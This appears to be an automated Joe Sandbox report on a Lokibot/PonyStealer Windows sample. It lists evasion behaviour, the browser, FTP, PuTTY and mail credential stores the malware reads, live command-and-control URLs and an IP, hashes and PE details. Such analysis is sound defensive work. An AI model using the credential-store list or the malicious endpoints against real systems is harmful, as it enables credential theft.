Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe TID: 7608	Thread sleep count: 32 > 30			Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe TID: 7632	Thread sleep time: -60000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

1_2_00403D74

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: XZoxEqlRUw.exe, 00000001.00000002.1683820658.00000000006B8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]

1_2_0040317B

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,

1_2_00402B7C

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Process created: C:\Users\user\Desktop\XZoxEqlRUw.exe "C:\Users\user\Desktop\XZoxEqlRUw.exe"

Jump to behavior

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Code function: 1_2_00406069 GetUserNameW,

1_2_00406069

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Generic Dropper

Source: Yara match

File source: Process Memory Space: XZoxEqlRUw.exe PID: 7604, type: MEMORYSTR

Yara detected Lokibot

Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: XZoxEqlRUw.exe PID: 7604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XZoxEqlRUw.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe	Code function: SmtpPassword		1_2_0040D069

Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XZoxEqlRUw.exe.4dd41c2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.XZoxEqlRUw.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1616007059.0000000004DD4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	21 Virtualization/Sandbox Evasion	2 Credentials in Registry	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
XZoxEqlRUw.exe	96%	ReversingLabs	Win32.Infostealer.PonyStealer
XZoxEqlRUw.exe	100%	Avira	TR/Dropper.Gen
XZoxEqlRUw.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://kbfvzoboss.bid/alien/fre.php	100%	URL Reputation	malware
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
http://www.ibsensoftware.com/	0%	URL Reputation	safe
https://rankmath.com/	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	100%	URL Reputation	malware
http://alphastand.trade/alien/fre.php	100%	URL Reputation	malware
	0%	Avira URL Cloud	safe
http://31.220.1.194/~zadmin/ptr5/mono.php	0%	Avira URL Cloud	safe
https://www.yaworld.net/wp-content/uploads/2023/11/android-chrome-512x512-1.png	0%	Avira URL Cloud	safe
https://www.yaworld.net/wp-json/	0%	Avira URL Cloud	safe
https://www.yaworld.net/#organization	0%	Avira URL Cloud	safe
https://www.yaworld.net/#logo	0%	Avira URL Cloud	safe
https://www.yaworld.net/feed/	0%	Avira URL Cloud	safe
https://www.yaworld.net	0%	Avira URL Cloud	safe
https://www.yaworld.net/comments/feeP	0%	Avira URL Cloud	safe
https://www.yaworld.net/#website	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: malware	unknown
	true	Avira URL Cloud: safe	low
http://31.220.1.194/~zadmin/ptr5/mono.php	true	Avira URL Cloud: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: malware	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ogp.me/ns#	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.yaworld.net/#organization	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yaworld.net/#website	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ibsensoftware.com/	XZoxEqlRUw.exe, XZoxEqlRUw.exe, 00000001.00000002.1683683181.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rankmath.com/	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.yaworld.net/wp-content/uploads/2023/11/android-chrome-512x512-1.png	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yaworld.net/#logo	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yaworld.net	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.w.org/	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.yaworld.net/comments/feeP	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://schema.org	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.yaworld.net/wp-json/	XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.yaworld.net/feed/	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gmpg.org/xfn/11	XZoxEqlRUw.exe, 00000001.00000002.1684081964.00000000025E9000.00000004.00000020.00020000.00000000.sdmp, XZoxEqlRUw.exe, 00000001.00000002.1683864345.000000000071D000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
31.220.1.194	unknown	Germany		206264	AMARUTU-TECHNOLOGYNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417280
Start date and time:	2024-03-28 20:56:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	XZoxEqlRUw.exe renamed because original name is a hash value
Original Sample Name:	06E4CE3AA8AE08067B686BA000255529.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 39 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: XZoxEqlRUw.exe

Simulations

Behavior and APIs

Time	Type	Description
20:56:55	API Interceptor	1x Sleep call for process: XZoxEqlRUw.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
31.220.1.194	DhthVKzHuf.exe	Get hash	malicious	Lokibot	Browse	31.220.1.194/~zadmin/ap2/mono.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMARUTU-TECHNOLOGYNL	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	185.169.253.175
	havHHgUTMf.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	XhXwuGeQt1.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	pqV96ooXHb.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	K0NrQivg3A.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	EMhQG2ir2C.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	37sRIovciS.elf	Get hash	malicious	Unknown	Browse	31.220.1.59
	4c.exe	Get hash	malicious	Gurcu Stealer	Browse	103.109.100.207
	ZPOTTBoLVM.exe	Get hash	malicious	Lokibot	Browse	31.220.2.200
	9DC06019847EB815CD4E5DB3D870013D052888AA6A978.exe	Get hash	malicious	Lokibot	Browse	31.220.2.200

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Users\user\Desktop\XZoxEqlRUw.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\XZoxEqlRUw.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.187327664369761
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	XZoxEqlRUw.exe
File size:	241'664 bytes
MD5:	06e4ce3aa8ae08067b686ba000255529
SHA1:	21369f523a74aedde8612c9dbf6d5b9df6557a51
SHA256:	c84552f0ddf17223045ee2c4e5aa5a4b59eea802f9d1548b0ff7e5cee3d14186
SHA512:	30c482d8b9f1ceb0e84e87e2de648b0f3619f5f7c8bc1b14630c5d888fac4168d4ce3ef3b89b31ad9d1d80e65c359d84dd0eb5fcdf46cbaa50e927757df040a5
SSDEEP:	3072:AN3O9HE6pE5ew7kIHu8ehLE+lEGoSmLhlvKaefv4gFMcNpC3wom0d:AZO9HBa5LwbthLxodhlvKae4gJTy
TLSH:	4934F241E2E5E8F2DD86923A4437CE7D5B5FBD482E90AC17B912F70E9CB1EC0A501572
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L......Z.................0... ...............`....@................

File Icon


Icon Hash:	00869eb0b230201f

Static PE Info

General

Entrypoint:	0x401188
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5A970D0B [Wed Feb 28 20:11:55 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d61a8b9d7d6225bf27124078418a3c99

Entrypoint Preview

Instruction
push 0043162Ch
call 00007F08348D67B5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+ecx-29h], bl
leave
sbb eax, D6B44A80h
fsub qword ptr [edx+67h]
dec eax
add al, 3Eh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
and byte ptr [eax], ah
xor dword ptr [6F70090Ah], ecx
jnc 00007F08348D6836h
jo 00007F08348D6823h
jc 00007F08348D6836h
jne 00007F08348D6834h
imul esi, dword ptr [ecx+ebp*2+6Fh], 0000006Eh
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
adc ebx, esi
inc cx
repne stosb
jle 00007F08348D680Ch
inc eax
scasd
outsd
xchg dword ptr [ecx-195EA485h], ebx
xor esi, dword ptr [ecx-4EF43D65h]
hlt
dec edx
movsd
insd
outsd
or dword ptr [ebx+3AE2E00Ah], ecx
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
stosb
add eax, dword ptr [ebx]
add byte ptr [edx+00h], cl
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [esi+6Ch], ah
outsd
outsb
insb
jnc 00007F08348D6836h
popad
jbe 00007F08348D682Eh
jc 00007F08348D6831h
jnc 00007F08348D67C3h
or eax, 00000601h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x350f4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0xa10	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x94	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x343fc	0x35000	e533152656cfd9a190f66155e544f066	False	0.8311007517688679	data	7.45421010060428	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x36000	0xf00	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x37000	0xa10	0x1000	49f6ade8aee55dbfbe93a4967353185c	False	0.203125	Windows boot log, header size 0x5a970d0b, 0x30000 valid bytes	2.26238387029308	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
